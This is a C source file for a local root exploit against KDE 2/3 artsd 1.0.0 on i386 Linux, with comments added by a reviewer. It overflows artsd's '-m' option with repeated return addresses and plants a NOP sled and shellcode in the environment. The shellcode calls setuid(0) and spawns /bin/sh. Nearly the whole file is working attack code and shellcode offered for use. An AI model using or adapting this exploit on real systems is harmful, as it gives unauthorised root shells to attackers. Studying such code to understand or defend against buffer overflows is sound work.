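/* bp_artsd.c
 *
 * KDE 2/3 artsd 1.0.0 local root exploit (i386 Linux; RET tested on SuSE Linux 8.0).
 *
 * credits: dvorak (helped me A LOT!@#), electronicsouls.org
 * greets:  bp members, dvorak, null, r00t, obz, rafa, nouse, module, phrack man,
 *          philer, preamble, eth1cal
 *
 * -kokane
 *
 * What the code below builds (see main()):
 *   argv[2] : BSIZE-1 bytes made of back-to-back copies of the return address,
 *             passed as the value of artsd's "-m" option -- this is the
 *             overlong string that overflows.
 *   envp[0] : "UNF=" + NOP sled + shellcode, the only environment entry, so the
 *             egg sits at a predictable place near the top of the new stack.
 *
 * NOTE(review): the listing this was taken from had lost its header names
 * (three bare "#include" tokens); the headers below are the ones the calls in
 * this file need.  The shellcode and the RET value are i386-specific -- build
 * and run this only as 32-bit x86 code.  The setuid(0) in the shellcode only
 * yields root if the target artsd runs with elevated privilege (the page's
 * "local root" claim assumes a setuid-root install); otherwise the shell is
 * the caller's own.
 */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BSIZE 1033       /* overflow string: 1032 bytes of RET + terminating NUL */
#define ESIZE 5120       /* egg: "UNF=" + NOP sled + shellcode + terminating NUL */
#define RET   0xbffff808 /* default return address -- tested on SuSE Linux 8.0 */

/* i386 Linux shellcode.  Contains no 0x00 byte, which matters: it is measured
 * with strlen() and handed to execve() inside a C string. */
unsigned char buttcode[] =
    "\x33\xDB\x33\xC0\xB0\x1B\xCD\x80"  /* xor ebx,ebx; xor eax,eax; mov al,27; int 0x80 -> alarm(0) */
    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80"  /* xor ebx,ebx; mov eax,ebx; mov al,23; int 0x80 -> setuid(0) */
    "\x31\xc0\x50\x50\xb0\xb5\xcd\x80"  /* labelled "setgid(0)" by the author.
                                         * NOTE(review): push/push + al=0xb5 (181) is the *BSD
                                         * calling convention, where 181 is setgid; on Linux/i386
                                         * setgid is 46 (setgid32 is 214), so this stub most likely
                                         * does not drop to gid 0 here -- verify or replace. */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";  /* jmp/call trick: execve("/bin/sh", {"/bin/sh", 0}, 0); then exit(0) */

/* Replace this process with /opt/kde3/bin/artsd, passing `rets` as the value
 * of the "-m" option and `evil` as the one and only environment entry.
 * execve() does not return on success; if it does return, it failed and
 * errno is set -- the caller reports it. */
void anal(char *rets, char *evil)
{
    char *arg_[] = { "artsd", "-m", rets, NULL };
    char *env_[] = { evil, NULL };

    execve("/opt/kde3/bin/artsd", arg_, env_);
}

/* Usage: bp_artsd [ret_addr]
 *   ret_addr  optional override for RET, in any base strtoul() accepts
 *             (e.g. 0xbffff7f8); it must be a 32-bit stack address with no
 *             0x00 byte, or the overflow string is cut short at execve().
 * Returns 1 if the override is malformed or execve() fails; never returns
 * on success because the process image is replaced by artsd. */
int main(int argc, char **argv)
{
    char buf[BSIZE], egg[ESIZE];
    unsigned long retaddr = RET;
    uint32_t ret32;
    size_t sclen, i;

    fprintf(stdout, "\n+ KDE 2/3 artsd 1.0.0 local root exploit (bp_artsd.c)\n+ by kokane/buttP!RATEZ\n");

    /* Optional return-address override; reject junk instead of silently using 0. */
    if (argc > 1) {
        char *end;

        errno = 0;
        retaddr = strtoul(argv[1], &end, 0);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "+ bad ret_addr: %s\n", argv[1]);
            return 1;
        }
    }
    ret32 = (uint32_t)retaddr;          /* the target is 32-bit; the stored value is 4 bytes wide */
    fprintf(stdout, "\n+ ret_addr: 0x%lx\n\n", retaddr);

    /* buf[0 .. BSIZE-2] = 258 consecutive copies of the return address, in host
     * byte order, then a NUL.  memcpy() replaces the original's
     * *(unsigned long *)&buf[i] store: same bytes on i386, but no misaligned /
     * aliasing access and still exactly 4 bytes per copy on 64-bit hosts. */
    for (i = 0; i + sizeof ret32 <= BSIZE - 1; i += sizeof ret32)
        memcpy(&buf[i], &ret32, sizeof ret32);
    buf[BSIZE - 1] = '\0';

    /* egg = "UNF=" + 0x90 NOP sled + shellcode + NUL.  The shellcode is placed
     * flush against the end so any landing point inside the sled slides into it. */
    sclen = strlen((const char *)buttcode);
    memset(egg, 0x90, sizeof egg);
    memcpy(egg, "UNF=", 4);
    memcpy(egg + ESIZE - 1 - sclen, buttcode, sclen);
    egg[ESIZE - 1] = '\0';

    anal(buf, egg);

    /* Only reached if execve() failed (binary missing, not executable, ...);
     * the original silently exited 0 here, hiding the failure. */
    perror("+ execve /opt/kde3/bin/artsd");
    return 1;
}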